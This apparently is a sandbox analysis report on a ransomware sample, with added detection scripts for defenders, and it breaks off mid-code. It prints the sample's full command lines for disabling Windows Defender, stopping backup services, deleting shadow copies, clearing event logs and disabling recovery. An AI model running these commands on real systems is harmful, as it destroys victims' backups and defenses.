File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_HAAAABwAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyReport.dotx.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 3284 wrote to memory of 1456 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3284 wrote to memory of 1456 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 3200 wrote to memory of 464 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3200 wrote to memory of 464 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1972 wrote to memory of 4128 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1972 wrote to memory of 4128 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 4284 wrote to memory of 4496 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4284 wrote to memory of 4496 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 2392 wrote to memory of 3308 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2392 wrote to memory of 3308 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 2176 wrote to memory of 4184 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2176 wrote to memory of 4184 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 4940 wrote to memory of 1348 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4940 wrote to memory of 1348 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1324 wrote to memory of 2980 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1324 wrote to memory of 2980 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
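The rows above are easier to read as a tree, and the doubled entries (the sandbox records two WriteProcessMemory calls for every CreateProcess) collapse once the (parent, child) pairs are de-duplicated. The following parser is an added example, not part of the sandbox output; it assumes the row format exactly as rendered on this page and uses a constructed subset of the rows as sample input.

```python
"""Rebuild the process tree from WriteProcessMemory rows of the form
'PID <src> wrote to memory of <dst> N/A <src image> <dst image>'.
Added example, not part of the sandbox report; the row format is assumed
from the table as rendered on this page."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)")

# Constructed sample: a few rows copied from the table, including the
# doubled entries the sandbox emits (two writes per CreateProcess).
SAMPLE_ROWS = r"""
PID 1540 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 3284 wrote to memory of 1456 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3284 wrote to memory of 1456 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
"""


def parse_rows(text: str) -> Tuple[Set[Tuple[int, int]], Dict[int, str]]:
    """Return de-duplicated (parent, child) edges and a pid -> image map."""
    edges: Set[Tuple[int, int]] = set()
    images: Dict[int, str] = {}
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # skip anything that is not a table row
        src, dst, src_img, dst_img = m.groups()
        edges.add((int(src), int(dst)))  # the set collapses the doubled rows
        images[int(src)] = src_img
        images[int(dst)] = dst_img
    return edges, images


def build_tree(edges: Set[Tuple[int, int]]):
    """Children per parent (sorted by pid) and the roots: writers that
    were never themselves written to, i.e. the top of the tree."""
    children: Dict[int, List[int]] = defaultdict(list)
    for parent, child in sorted(edges):
        children[parent].append(child)
    written_to = {child for _, child in edges}
    roots = sorted({parent for parent, _ in edges} - written_to)
    return roots, children


def render_tree(text: str) -> List[str]:
    """One indented line per process: '<pid> <image basename>'."""
    edges, images = parse_rows(text)
    roots, children = build_tree(edges)
    out: List[str] = []

    def walk(pid: int, depth: int) -> None:
        basename = images[pid].rsplit("\\", 1)[-1]
        out.append("  " * depth + f"{pid} {basename}")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return out


if __name__ == "__main__":
    print("\n".join(render_tree(SAMPLE_ROWS)))
```

The rendered tree makes one detection point obvious: net.exe does nothing itself but spawn net1.exe, so a rule that keys on "net1.exe stop" with parent net.exe sees a benign-looking pair; the interesting ancestor (ransomware.exe) is two levels up, and process-tree rules for this behaviour need to walk to the grandparent.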

Processes

C:\Users\Admin\AppData\Local\Temp\ransomware.exe

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_1819a" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_1819a" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_1819a" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
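Taken together, the command lines above are the complete pre-encryption sequence this sample runs: stop and disable backup and VSS-related services, turn Defender off through policy keys, service Start values, ETW autologgers, scheduled tasks, definition removal and Set-MpPreference, delete shadow copies twice (vssadmin and wmic), clear the three main event logs, and disable Windows recovery through bcdedit. No single line is conclusive on its own; an administrator legitimately stops a service or clears a log. The breadth of tactics from one parent within a short window is what separates this from maintenance. The classifier below is an added example written for this page, not part of the sandbox report; the tag names are my own labels rather than sandbox signature names, the alert threshold is an assumption to tune, and the sample input is a constructed subset of the commands listed above plus one benign command.

```python
"""Tag process command lines with the pre-encryption tactics observed in
this report and alert on breadth across one process tree. Added example,
not part of the sandbox output; tag names are the author's own labels."""
import re
from typing import Dict, List

# One rule per tactic, matched against the lower-cased command line so that
# net.exe / net1, reg.exe / reg and the SYSTEM32 / system32 spellings all hit.
RULES = [
    ("service_stop",
     re.compile(r'\bnet1?(\.exe)?\s+stop\s+')),
    ("service_disable",
     re.compile(r'\bsc(\.exe)?\s+config\s+.*start=\s*disabled')),
    ("defender_policy",
     re.compile(r'\breg(\.exe)?\s+(add|delete)\s+"hklm\\software\\policies\\microsoft\\windows defender')),
    ("defender_service_off",
     re.compile(r'\breg(\.exe)?\s+add\s+"hklm\\system\\currentcontrolset\\services\\'
                r'(wdboot|wdfilter|wdnisdrv|wdnissvc|windefend|securityhealthservice)"'
                r'\s+/v\s+"start"\s+/t\s+reg_dword\s+/d\s+"4"')),
    ("defender_etw_off",
     re.compile(r'\\wmi\\autologger\\defender(api|audit)logger')),
    ("defender_task_off",
     re.compile(r'\bschtasks(\.exe)?\s+/change\s+/tn\s+".*(windows defender|exploitguard).*"\s+/disable')),
    ("defender_definitions_removed",
     re.compile(r'mpcmdrun(\.exe)?"?\s+-removedefinitions')),
    ("defender_pref_off",
     re.compile(r'set-mppreference\s+-disable\w+\s+\$true')),
    ("shadow_copy_delete",
     re.compile(r'\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete')),
    ("event_log_clear",
     re.compile(r'\bwevtutil(\.exe)?\s+cl\s+')),
    ("recovery_disable",
     re.compile(r'\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+'
                r'(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)')),
]

# Constructed sample: a subset of the command lines from the Processes
# section above plus one benign command that must not match anything.
SAMPLE = [
    r'net.exe stop "VSS" /y',
    r'sc.exe config "VSS" start= disabled',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
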